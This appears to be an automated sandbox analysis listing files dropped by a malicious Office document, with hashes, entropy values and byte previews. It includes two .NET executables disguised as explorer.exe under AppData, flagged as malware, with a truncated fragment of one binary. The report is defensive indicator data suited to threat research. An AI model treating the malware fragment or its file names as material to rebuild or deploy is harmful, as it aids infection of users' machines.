SHA-256:	AE311E511D5247016BD50D3ECB1B74EF5043E70F5FE80740B4873C2D1F9EC9BA
SHA-512:	011C715456294F33A9E5550B1081E5CEBFD278359467BCDC983C42A279AE06770754EE8F8A4E7DB7AF59116FBF66C295874C22602CEE37C9E47A93447AE93C76
Malicious:	false
Preview:	[folders]..Templates.LNK=0..Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK=0..[doc]..Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
MD5:	7CFA404FD881AF8DF49EA584FE153C61
SHA1:	32D9BF92626B77999E5E44780BF24130F3D23D66
SHA-256:	248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
SHA-512:	F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.578048501856237
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
MD5:	0F8AC75BD0077688ACCFEE9437697FA8
SHA1:	08223348762A77176589DB294E05FF3C20C3218D
SHA-256:	EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
SHA-512:	4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4e04a3.TMP (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.578048501856237
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
MD5:	0F8AC75BD0077688ACCFEE9437697FA8
SHA1:	08223348762A77176589DB294E05FF3C20C3218D
SHA-256:	EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
SHA-512:	4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4e3064.TMP (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.578048501856237
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
MD5:	0F8AC75BD0077688ACCFEE9437697FA8
SHA1:	08223348762A77176589DB294E05FF3C20C3218D
SHA-256:	EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
SHA-512:	4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5F3QBZVQ9RFEIWMV6CQN.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.580975945365273
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
MD5:	E0773AA865B4F855FCAF7F3A6E7A84D9
SHA1:	CD5131197E93BA193CBDBAA557F5059DF306EFF9
SHA-256:	C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
SHA-512:	FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\66P2GWKWYVB9UJIL9LXB.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.580975945365273
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
MD5:	E0773AA865B4F855FCAF7F3A6E7A84D9
SHA1:	CD5131197E93BA193CBDBAA557F5059DF306EFF9
SHA-256:	C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
SHA-512:	FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CQYZNWTS7YT610P4ZIUZ.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.578048501856237
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
MD5:	0F8AC75BD0077688ACCFEE9437697FA8
SHA1:	08223348762A77176589DB294E05FF3C20C3218D
SHA-256:	EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
SHA-512:	4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DGJNWFN59TABKE06N13V.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.578048501856237
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
MD5:	0F8AC75BD0077688ACCFEE9437697FA8
SHA1:	08223348762A77176589DB294E05FF3C20C3218D
SHA-256:	EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
SHA-512:	4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QFNUDIY2A3J44VPMGKOZ.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.580975945365273
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
MD5:	E0773AA865B4F855FCAF7F3A6E7A84D9
SHA1:	CD5131197E93BA193CBDBAA557F5059DF306EFF9
SHA-256:	C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
SHA-512:	FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T23CVE88X1M7GW0B4GPE.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.578048501856237
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
MD5:	0F8AC75BD0077688ACCFEE9437697FA8
SHA1:	08223348762A77176589DB294E05FF3C20C3218D
SHA-256:	EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
SHA-512:	4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.580975945365273
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
MD5:	E0773AA865B4F855FCAF7F3A6E7A84D9
SHA1:	CD5131197E93BA193CBDBAA557F5059DF306EFF9
SHA-256:	C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
SHA-512:	FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4e4412.TMP (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.580975945365273
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
MD5:	E0773AA865B4F855FCAF7F3A6E7A84D9
SHA1:	CD5131197E93BA193CBDBAA557F5059DF306EFF9
SHA-256:	C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
SHA-512:	FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4e978f.TMP (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.580975945365273
Encrypted:	false
SSDEEP:	96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
MD5:	E0773AA865B4F855FCAF7F3A6E7A84D9
SHA1:	CD5131197E93BA193CBDBAA557F5059DF306EFF9
SHA-256:	C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
SHA-512:	FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\eDdYRRbouy.exe

Download File

Process:	C:\Users\user\AppData\Roaming\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	974336
Entropy (8bit):	6.592752877706246
Encrypted:	false
SSDEEP:	12288:ahLuyAHrR2ZEgL6+8ik8VuLCBTodngkt8OsyqAx+NbqzjMRZeFoTPo:ahLuyyNmadFdgsF+NZRZeFgo
MD5:	87B246B26208A9831A4372664C518C2C
SHA1:	1599CBF0EE49DCB787866FBB7C297094ECD3AB4F
SHA-256:	27FD2AB0BBD65CBE5625932FA7AB1F484A06CBDFF8868129F10CD92321D99DAF
SHA-512:	4E7F5A217DBCD34EAADF867CD75ACB23AE01730794AE8AC23A2428BE5160FA8DFF78B5B3E202A1E898E73126CEA4FE19BF6A9F6457D136433D61E16435D69FF1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...MP................0.................. ... ....@.. .......................@............@.................................0...O.... ..X.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc....... ......................@..B................d.......H.......$....X......6.......p.............................................s}...}......}.....(.......(.......0...........s......o......(........0............{....o....r...p(....,..{....o....r...p(....,..{....o....r...p(....+....9......{....o.....{....o....(......,W..{.....{....o.....{....o....o\|.....,#.r...p(....&s......o......(......+.r)..p(....&.+.rK..p(....&.r...p(....&....0..+.........,..{.......+....,...{....o........(.......0............s....}.....s....}.....s....}..

C:\Users\user\AppData\Roaming\explorer.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	974336
Entropy (8bit):	6.592752877706246
Encrypted:	false
SSDEEP:	12288:ahLuyAHrR2ZEgL6+8ik8VuLCBTodngkt8OsyqAx+NbqzjMRZeFoTPo:ahLuyyNmadFdgsF+NZRZeFgo
MD5:	87B246B26208A9831A4372664C518C2C
SHA1:	1599CBF0EE49DCB787866FBB7C297094ECD3AB4F
SHA-256:	27FD2AB0BBD65CBE5625932FA7AB1F484A06CBDFF8868129F10CD92321D99DAF
SHA-512:	4E7F5A217DBCD34EAADF867CD75ACB23AE01730794AE8AC23A2428BE5160FA8DFF78B5B3E202A1E898E73126CEA4FE19BF6A9F6457D136433D61E16435D69FF1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
